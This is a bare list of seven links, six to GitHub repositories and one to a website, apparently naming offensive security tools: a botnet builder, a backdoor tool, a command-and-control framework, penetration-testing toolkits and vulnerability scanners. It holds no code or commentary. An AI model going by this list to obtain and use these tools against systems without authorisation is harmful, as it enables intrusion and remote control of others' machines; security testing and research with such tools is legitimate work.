https://github.com/malwaredllc/byob

https://github.com/koutto/jok3r

https://github.com/guardicore/monkey

https://github.com/jeffzh3ng/Fuxi-Scanner

https://github.com/KeepWannabe/Remot3d

https://github.com/knownsec/Pocsuite

https://www.factionc2.com